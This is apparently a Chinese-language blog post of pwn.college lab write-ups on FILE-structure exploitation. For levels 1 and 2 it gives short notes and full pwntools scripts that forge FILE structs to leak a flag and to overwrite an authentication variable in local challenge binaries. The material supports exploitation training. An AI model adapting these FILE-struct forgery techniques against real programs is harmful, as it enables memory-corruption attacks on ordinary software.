落日歸山海,與你話清風。
388 words
2 minutes
Write-ups: Software Exploitation (File Struct Exploits) series
前言
Finally,花了五个月差不多把 pwn 学完了,至于剩下的内核什么的后期就当兴趣学了,应该不会变成我的主要研究方向,所以等学完这两章 FSOP 的内容我就去搞 IoT,也能想象明年开始将全力以赴打比赛,暗无天日的坐牢(
总之希望竞赛时期不要太长,最好能够一年退役,我可不想整个大学生活都在坐牢 LOL
Level 1
Information
- Category: Pwn
Description
Harness the power of FILE structs to arbitrarily read data.
Write-up
最简单的一集。 chall 把 flag 读到 bss 了,并且没开 PIE,还给了任意写 FILE 结构体的能力,直接用 pwntools 秒了。
Exploit
#!/usr/bin/env python3
from pwn import ( ELF, FileStructure, args, context, flat, process, raw_input, remote,)
FILE = "/challenge/babyfile_level1"HOST, PORT = "localhost", 1337
context(log_level="debug", binary=FILE, terminal="kitty")
elf = context.binary
def mangle(pos, ptr, shifted=1): if shifted: return pos ^ ptr return (pos >> 12) ^ ptr
def demangle(pos, ptr, shifted=1): if shifted: return mangle(pos, ptr) return mangle(pos, ptr, 0)
def launch(): global target if args.L: target = process(FILE) else: target = remote(HOST, PORT, ssl=True)
def main(): launch()
flag = 0x4040E0
fp = FileStructure() payload = flat(fp.write(flag, 0x64))
target.send(payload)
target.interactive()
if __name__ == "__main__": main()Level 2
Information
- Category: Pwn
Description
Harness the power of FILE structs to arbitrarily write data to bypass a security check.
Write-up
验证变量,构造任意读即可。
Exploit
#!/usr/bin/env python3
from pwn import ( ELF, FileStructure, args, context, flat, process, raw_input, remote,)
FILE = "/challenge/babyfile_level2"HOST, PORT = "localhost", 1337
context(log_level="debug", binary=FILE, terminal="kitty")
elf = context.binary
def mangle(pos, ptr, shifted=1): if shifted: return pos ^ ptr return (pos >> 12) ^ ptr
def demangle(pos, ptr, shifted=1): if shifted: return mangle(pos, ptr) return mangle(pos, ptr, 0)
def launch(): global target if args.L: target = process(FILE) else: target = remote(HOST, PORT, ssl=True)
def main(): launch()
authenticated = 0x4041F8
fp = FileStructure() payload = flat(fp.read(authenticated, 0x101))
target.success(fp)
target.send(payload) target.sendline(b"A" * 0xFF)
target.interactive()
if __name__ == "__main__": main() Write-ups: Software Exploitation (File Struct Exploits) series
https://cubeyond.net/posts/write-ups/pwncollege-file-struct-exploits/